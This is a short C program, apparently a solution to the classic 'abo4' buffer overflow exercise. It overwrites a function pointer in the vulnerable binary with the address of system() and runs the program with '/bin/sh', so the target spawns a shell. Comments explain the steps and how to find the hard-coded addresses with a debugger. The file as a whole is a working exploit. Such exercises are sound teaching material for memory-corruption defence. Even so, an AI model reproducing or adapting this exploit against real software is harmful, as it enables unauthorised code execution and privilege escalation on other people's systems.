
/* Copyright 2002, Gal Badishi */

/* Step1: Overwrite pbuf with the address of fn.
   Step2: Overwrite fn with the address of system.
   Step3: Execute fn with "/bin/sh" as an argument. */

#include <stdlib.h>

/* The address of system can be found by debugging the executable and looking
   at the preinitialezed value of fn. The address of fn can be found much in
   the same way (and should be found first, actually). */

#define FN_ADDRESS 0x804958c
#define SYSTEM_ADDRESS 0x804837c
#define BUF_SIZE 260
#define COMMAND "/bin/sh"

int main() {

  char buf[BUF_SIZE + 1], *ptr;
  char pbuf[sizeof(unsigned int *) + 1];

  for (ptr = buf; ptr < buf + BUF_SIZE - sizeof(unsigned int *) + 1; ptr += sizeof(unsigned int *))
    *((unsigned int *) ptr) = FN_ADDRESS;
  *ptr = '\0';
  *((unsigned int *) pbuf) = SYSTEM_ADDRESS;
  pbuf[sizeof(unsigned int *)] = '\0';
  execl("./abo4", "./abo4", buf, pbuf, COMMAND, NULL);
  return(0);
}
